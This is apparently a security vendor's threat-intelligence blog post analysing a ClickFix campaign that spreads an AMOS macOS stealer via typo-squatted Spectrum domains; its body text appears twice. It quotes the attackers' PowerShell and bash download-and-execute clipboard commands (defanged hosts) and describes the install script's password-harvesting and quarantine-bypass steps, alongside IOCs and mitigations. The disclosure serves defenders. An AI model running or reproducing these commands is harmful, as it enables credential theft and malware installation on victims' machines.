🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Adversary Intelligence
7
mins read

AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.

Koushik Pal
June 4, 2025
Green Alert
Last Update posted on
June 9, 2025
Proactive Monitoring of the Dark Web for your organization.

Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Executive Summary

A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.

When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.

Clipboard - Non macOS useragent

powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

This is one of the most commonly used delivery methods for Windows users.

Clipboard - macOS useragent

/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.

/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.

curl -fsSL <URL>:

  • -f: Fail silently on HTTP errors.
  • -s: Silent mode (no progress output).
  • -S: Show error if -s is used and the request fails.
  • -L: Follow redirects.
  • It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.

The output of curl (i.e., the install.sh script) is executed immediately by Bash.

Contents of install.sh

Password Harvesting:

  1. Gets Current User: username=$(whoami)
  2. Password Prompt Loop: Continuously prompts "System Password:" until correct password entered
  3. Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
  4. Password Storage: Saves the valid password to /tmp/.pass file

Download & Execution:

  1. Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Removes Quarantine: Uses stolen password with sudo -S xattr -c to bypass macOS security
  3. Makes Executable: chmod +x /tmp/update
  4. Executes Malware: Runs the downloaded file /tmp/update

Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.

Latest Delivery Method

Following CloudSEK's disclosure of their tactics and network, the hackers shifted to a new distribution method: malicious advertisements for counterfeit GitHub repositories aimed at Homebrew-using developers.(h/t Jérôme Segura - Malwarebytes)

The observed attack sequence mirrors the previously investigated case, involving a deceptive script ("install[.]sh") that fetches an "update" payload, which is a variant of AMOS. The infection process unfolds as follows:

  • Malvertising/Clickfix redirects users to their terminal.
  • When the "install[.]sh" script is executed, it collects user details, asks for and verifies passwords, then saves them. 
  • Subsequently, it retrieves the AMOS variant payload and configures it for automatic launch via bash.
  • The AMOS variant payload executes automatically after install[.]sh.

On 6th June 2025, the threat actor created the fake “Homebrew” repository.

These commits were simply being made to replace old command and control servers with the new ones. 

As we can see above, the threat actor removed their existing C2 and added the legitimate Homebrew installation (raw github) path, likely to establish authenticity for malvertising.

Later, the legitimate URL was replaced by attacker controlled C2s. All the IOCs from the repository have been added to the table at the end of this report.

Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.

The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.

Tactics, Techniques and Procedures

IOCs & IOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack
Domain homebrewrp[.]com Command and Control
Domain brewory[.]com Command and Control
MD5 Hash 6fd092d86235d7ae35c557523f493674 AMOS Variant

Impact

  • Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
  • Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
  • Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.

Mitigations

  • User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
  • macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
  • Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.

References

Author

Koushik Pal

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
Adversary Intelligence

7

min read

AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.

Authors
Koushik Pal
Co-Authors
No items found.

Executive Summary

A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites found to be typoquatting Spectrum, a US based company providing services for cable television, internet access, internet security, managed services, mobile phone, and unified communications.

When the victim clicks on “Alternative Verification”, a command is copied to the clipboard, and instructions are displayed for the victim to follow. Just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.

Clipboard - Non macOS useragent

powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

This is one of the most commonly used delivery methods for Windows users.

Clipboard - macOS useragent

/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.

/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.

curl -fsSL <URL>:

  • -f: Fail silently on HTTP errors.
  • -s: Silent mode (no progress output).
  • -S: Show error if -s is used and the request fails.
  • -L: Follow redirects.
  • It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.

The output of curl (i.e., the install.sh script) is executed immediately by Bash.

Contents of install.sh

Password Harvesting:

  1. Gets Current User: username=$(whoami)
  2. Password Prompt Loop: Continuously prompts "System Password:" until correct password entered
  3. Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
  4. Password Storage: Saves the valid password to /tmp/.pass file

Download & Execution:

  1. Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Removes Quarantine: Uses stolen password with sudo -S xattr -c to bypass macOS security
  3. Makes Executable: chmod +x /tmp/update
  4. Executes Malware: Runs the downloaded file /tmp/update

Upon analyzing the file saved as “update” within the “tmp” directory, we discovered that the malware belongs to the Atomic macOS stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey has been seen in the wild lately, gaining traction among cybercriminals.

Latest Delivery Method

Following CloudSEK's disclosure of their tactics and network, the hackers shifted to a new distribution method: malicious advertisements for counterfeit GitHub repositories aimed at Homebrew-using developers.(h/t Jérôme Segura - Malwarebytes)

The observed attack sequence mirrors the previously investigated case, involving a deceptive script ("install[.]sh") that fetches an "update" payload, which is a variant of AMOS. The infection process unfolds as follows:

  • Malvertising/Clickfix redirects users to their terminal.
  • When the "install[.]sh" script is executed, it collects user details, asks for and verifies passwords, then saves them. 
  • Subsequently, it retrieves the AMOS variant payload and configures it for automatic launch via bash.
  • The AMOS variant payload executes automatically after install[.]sh.

On 6th June 2025, the threat actor created the fake “Homebrew” repository.

These commits were simply being made to replace old command and control servers with the new ones. 

As we can see above, the threat actor removed their existing C2 and added the legitimate Homebrew installation (raw github) path, likely to establish authenticity for malvertising.

Later, the legitimate URL was replaced by attacker controlled C2s. All the IOCs from the repository have been added to the table at the end of this report.

Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs in addition to the IOCs.

The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.

Tactics, Techniques and Procedures

IOCs & IOFAs

Indicator Type Value Use
Domain panel-spectrum[.]net Clickfix Delivery
Domain spectrum-ticket[.]net Clickfix Delivery
Domain cf-verifi.pages[.]dev Command and Control
Domain applemacios[.]com Command and Control
MD5 Hash eaedee8fc9fe336bcde021bf243e332a AMOS Variant
URL https://cf-verifi.pages[.]dev/i.txt Contacted URLs
URL https://applemacios[.]com/getrur/install.sh Contacted URLs
URL https://applemacios[.]com/getrur/update Contacted URLs
Domain rugme[.]cat Clickfix Indicator of future attack
Domain homebrewrp[.]com Command and Control
Domain brewory[.]com Command and Control
MD5 Hash 6fd092d86235d7ae35c557523f493674 AMOS Variant

Impact

  • Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
  • Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
  • Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.

Mitigations

  • User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
  • macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
  • Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.

References